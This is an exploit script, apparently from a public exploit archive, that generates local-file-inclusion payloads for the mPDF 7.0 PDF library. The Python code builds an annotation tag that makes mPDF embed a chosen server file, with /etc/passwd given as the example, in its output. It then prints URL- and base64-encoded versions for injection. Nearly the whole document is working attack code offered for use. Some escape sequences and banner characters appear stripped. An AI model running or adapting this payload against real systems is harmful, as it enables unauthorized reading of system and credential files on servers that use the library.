mPDF 7.0 Local File Inclusion

# Exploit Title: mPDF 7.0 - Local File Inclusion
# Google Dork: N/A
# Date: 2022-07-23
# Exploit Author: Musyoka Ian
# Vendor Homepage: https://mpdf.github.io/
# Software Link: https://mpdf.github.io/
# Version: CuteNews
# Tested on: Ubuntu 20.04, mPDF 7.0.x
# CVE: N/A

#!/usr/bin/env python3

from urllib.parse import quote
from cmd import Cmd
from base64 import b64encode

class Terminal(Cmd):
    prompt = "nFile >> "
    def default(self, args):
        payload_gen(args)
def banner():
    banner = """                          _____  _____  ______   ______ ___  __   __                  _       _ _   
                         |  __ |  __ |  ____| |____  / _    / /                 | |     (_) |  
               _ __ ___  | |__) | |  | | |__        / / | | |  V /    _____  ___ __ | | ___  _| |_ 
               | '_ ` _ |  ___/| |  | |  __|      / /| | | |  > <    / _  / / '_ | |/ _ | | __|
               | | | | | | |    | |__| | |        / / | |_| | / .   |  __/>  <| |_) | | (_) | | |_ 
               |_| |_| |_|_|    |_____/|_|       /_/ (_)___(_)_/ _  ___/_/_ .__/|_|___/|_|__|
                                                                               | |                  
                                                                               |_|   """
    print(banner)
def payload_gen(fname):
    payload = f'<annotation file="{fname}" content="{fname}" icon="Graph" title="Attached File: {fname}" pos-x="195" />'
    encoded_payload = quote(payload)
    print("[+] Replace the content with the payload below")

    print(f"Url encoded payload:n{encoded_payload}n")
    base64enc = b64encode(encoded_payload.encode())
    print(f"Base64 encoded payload:n{base64enc.decode()}n")
if __name__ == ("__main__"):
    banner()
    print("Enter Filename eg. /etc/passwd")
    terminal= Terminal()
    terminal.cmdloop()